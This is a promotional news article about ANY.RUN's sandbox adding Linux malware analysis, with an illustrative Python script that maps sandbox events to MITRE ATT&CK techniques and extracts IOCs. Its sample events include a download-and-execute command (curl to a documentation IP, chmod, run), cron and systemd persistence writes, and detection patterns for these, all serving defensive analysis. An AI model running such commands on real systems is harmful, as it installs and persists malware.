Categories: cyber security

ANY.RUN Sandbox Now Lets SOC & DFIR Teams Analyze Sophisticated Linux Malware

The ANY.RUN sandbox has now been updated with support for Linux, further enhancing its ability to provide an isolated and secure environment for malware analysis and threat hunting.

This newly added feature will enable security analysts to investigate and simulate malicious activities in Linux-based systems, allowing for more comprehensive and effective threat detection and response.

ANY.RUN lets malware analysts, SOC members, and DFIR team members safely examine both Linux-based samples and Windows malware in an interactive cloud environment.

Linux malware analysis matters because Linux is a popular target for attackers, and the malware written for it is often sophisticated.

Many organizations run Linux across their IT infrastructure, so there are many files on Linux systems that need to be analyzed.

Researchers at IBM have noticed an increase in Linux malware. In 2020, the number of malware families related to Linux increased by 40%.

Compromising Linux-based cloud computing platforms could allow attackers access to massive resources, making the OS an appealing target.

ANY.RUN, a leader in malware sandboxing, is a cloud sandbox that handles the heavy lifting of phishing and malware analysis for SOC and DFIR teams; more than 300,000 professionals use the platform to investigate incidents and streamline threat analysis.

Creating a New Linux Task

You can select Linux from the Operating System drop-down menu when creating a new task.

If you choose it, your sample runs in Ubuntu. Ubuntu 22.04.2 is supported at launch, and Linux is available to all ANY.RUN users, including those on the community plan.

Linux as an option in the Operating system drop-down

The Ubuntu logo is used to identify Linux samples for easy navigation, making it simple to distinguish between Windows and Linux-based tasks in the team’s homepage menu and sidebar quick menu.

Analyse Sophisticated Malware with ANY.RUN

Try ANY.RUN Yourself with a 14-day Free Trial

More than 300,000 analysts worldwide use the ANY.RUN malware analysis sandbox. Join the community to conduct in-depth investigations into the top threats and collect detailed reports on their behavior.

Enhancing Linux Malware Analysis with ANY.RUN's Interactive Analysis

ANY.RUN's interactive analysis is now available for Linux samples for the first time. As it already does for Windows samples, it lets analysts of all levels deepen their threat analysis with fewer resources and shortens the training of entry-level analysts and reverse engineers.

Interactive analysis is the foundation of ANY.RUN: the analyst can intervene in the running task and change the direction of the analysis, which surfaces behavior that automated detection misses, including the exploitation of zero-day vulnerabilities. This capability is now available for Linux tasks.

Process Graph view – clear reports of ANY.RUN

Additionally, it provides real-time alerts to the analyst about suspicious activities, ensuring that no crucial information is ignored. 

Users receive concise reports upon task completion, ensuring analysts can access all relevant data and IOCs for additional investigation or incident response.  

One simple way to identify the malware family or threat type you are facing is to align the suspicious behaviors the sandbox recorded in a Linux task with known TTPs using ANY.RUN's MITRE ATT&CK Matrix report.

MITRE ATT&CK Matrix in ANY.RUN
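As an added illustration of the two steps described above, mapping recorded behaviors to ATT&CK techniques and collecting the IOCs for follow-up, the following Python is example code written for this article; it is not ANY.RUN's code and does not use ANY.RUN's report format. The event schema, the rule set and the sample events are assumptions constructed for the example; the technique IDs are the public ATT&CK ones.

```python
"""Map constructed Linux sandbox events to ATT&CK techniques and pull IOCs.

The event format here is a hypothetical, simplified one built for this
example; it is NOT ANY.RUN's report schema.
"""
import re

# Constructed sample of behaviors a sandbox might record for a Linux task.
SAMPLE_EVENTS = [
    {"type": "process", "cmd": "/bin/sh -c 'curl -s http://198.51.100.23/x86_64 -o /tmp/.x'"},
    {"type": "file_write", "path": "/tmp/.x"},
    {"type": "process", "cmd": "chmod +x /tmp/.x"},
    {"type": "process", "cmd": "/tmp/.x"},
    {"type": "net", "proto": "tcp", "dst": "198.51.100.23", "port": 80, "host": "198.51.100.23"},
    {"type": "net", "proto": "tcp", "dst": "203.0.113.9", "port": 443, "host": "update.example.net"},
    {"type": "file_write", "path": "/etc/cron.d/sysupdate"},
    {"type": "file_write", "path": "/etc/systemd/system/sysupdate.service"},
    {"type": "process", "cmd": "systemctl enable sysupdate.service"},
    {"type": "process", "cmd": "rm -f /tmp/.x"},
]

# Each rule: (technique id, technique name, event type, field, regex on that field).
# Hypothetical rule set; a real one would be far larger and tuned for noise.
RULES = [
    ("T1059.004", "Command and Scripting Interpreter: Unix Shell", "process", "cmd", r"^(/bin/)?(ba|da)?sh\b"),
    ("T1105", "Ingress Tool Transfer", "process", "cmd", r"\b(curl|wget)\b.*https?://"),
    ("T1222.002", "Linux and Mac File and Directory Permissions Modification", "process", "cmd", r"\bchmod\b"),
    ("T1053.003", "Scheduled Task/Job: Cron", "file_write", "path", r"^/etc/cron|^/var/spool/cron"),
    ("T1543.002", "Create or Modify System Process: Systemd Service", "file_write", "path", r"^/etc/systemd/system/.*\.service$"),
    ("T1543.002", "Create or Modify System Process: Systemd Service", "process", "cmd", r"^systemctl\s+enable\b"),
    ("T1070.004", "Indicator Removal: File Deletion", "process", "cmd", r"^rm\s+(-\w+\s+)*\S"),
    ("T1071.001", "Application Layer Protocol: Web Protocols", "net", "port", r"^(80|443|8080)$"),
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"https?://[^\s'\"]+")


def map_to_attack(events):
    """Return {technique_id: {"name": ..., "evidence": [matched values]}}."""
    hits = {}
    for ev in events:
        for tid, name, etype, field, pattern in RULES:
            if ev.get("type") != etype:
                continue
            value = str(ev.get(field, ""))  # ports are ints; compare as text
            if re.search(pattern, value):
                entry = hits.setdefault(tid, {"name": name, "evidence": []})
                entry["evidence"].append(value)
    return hits


def extract_iocs(events):
    """Collect network and file indicators from the same events, sorted for diffing."""
    iocs = {"ips": set(), "urls": set(), "domains": set(), "paths": set()}
    for ev in events:
        if ev["type"] == "net":
            iocs["ips"].add(ev["dst"])
            host = ev.get("host", "")
            if host and not IPV4.fullmatch(host):
                iocs["domains"].add(host)
        elif ev["type"] == "process":
            iocs["urls"].update(URL.findall(ev["cmd"]))
            iocs["ips"].update(IPV4.findall(ev["cmd"]))
        elif ev["type"] == "file_write":
            iocs["paths"].add(ev["path"])
    return {k: sorted(v) for k, v in iocs.items()}


def summarize(events):
    """One flat record per task, in the shape you would push to a SIEM or SOAR."""
    hits = map_to_attack(events)
    return {"techniques": sorted(hits), "iocs": extract_iocs(events)}


if __name__ == "__main__":
    for tid, info in sorted(map_to_attack(SAMPLE_EVENTS).items()):
        print(f"{tid:10} {info['name']}")
        for ev in info["evidence"]:
            print(f"{'':10}   <- {ev}")
    print(summarize(SAMPLE_EVENTS)["iocs"])
```

The rules match on the sandbox's recorded command lines, file writes and connections, which is what the matrix view aligns for you; the point of writing them out is that the same mapping feeds a SIEM record without a human re-reading the report.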

You can learn about 8 ANY.RUN Features you need to know about. 

Benefits of ANY.RUN for Analyzing Linux Malware

Linux hosts are generally a harder target than Windows, so the malware families that do succeed against them tend to be complex and challenging to identify.

ANY.RUN provides an easy way to analyze Linux malware, presenting results from the analysis in real time. Not every security expert has the reverse-engineering skill set to swiftly characterize the behavior of complex Linux malware and extract the required IOCs; the live results let analysts grasp what the sample is doing as it happens and proceed without context switching.

ANY.RUN is a cost-effective solution: it removes the need to build and maintain custom analysis infrastructure, and because the Linux virtual machines (VMs) come preconfigured to gather IOCs, customers avoid weeks of DevOps setup time.

In addition to being a stand-alone research platform, ANY.RUN can also be utilized in conjunction with SIEM/SOAR.

You can learn more about how to use ANY.RUN here.

Accurate analysis of malware for Linux is necessary for strong security. Because Linux is so widely used, particularly in cloud hosting, attackers find it a desirable target. Breaching Linux-based systems might provide access to a wealth of resources. As a result, Linux users need to be aware of the growing threats to their devices.

Try all features of ANY.RUN at zero cost for 14 days with a free trial.

Cyber Writes

Work done by a Team Of Security Experts from Cyber Writes (www.cyberwrites.com) - World’s First Dedicated Content-as-a-Service (CaaS) Platform for Cybersecurity. For Exclusive Cyber Security Contents, Reach at: business@cyberwrites.com
